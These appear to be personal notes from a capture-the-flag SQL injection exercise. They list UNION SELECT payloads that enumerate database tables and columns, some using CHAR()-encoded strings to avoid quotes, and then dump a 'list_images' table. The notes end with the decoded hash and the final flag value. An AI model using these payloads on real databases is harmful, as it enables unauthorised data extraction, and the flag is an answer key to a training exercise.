1 UNION SELECT table_name, NULL FROM information_schema.tables --

1 UNION SELECT database(), NULL --

1 UNION SELECT table_name, NULL FROM information_schema.tables WHERE table_schema = CHAR(77, 101, 109, 98, 101, 114, 95, 105, 109, 97, 103, 101, 115) --
1 UNION SELECT table_name, NULL FROM information_schema.tables WHERE table_schema = 'Member_images'

1 UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_name = CHAR(108, 105, 115, 116, 95, 105, 109, 97, 103, 101, 115) --
1 UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_name = 'list_images'

1 UNION SELECT comment, id FROM list_images --

If you read this just use this md5 decode lowercase then sha256 to win this flag ! : 1928e8083cf461a51303633093573c46

1928e8083cf461a51303633093573c46 decrypt = albatroz

Sh256 hash = f2a29020ef3132e01dd61df97fd33ec8d7fcd1388cc9601e7db691d17d4d6188
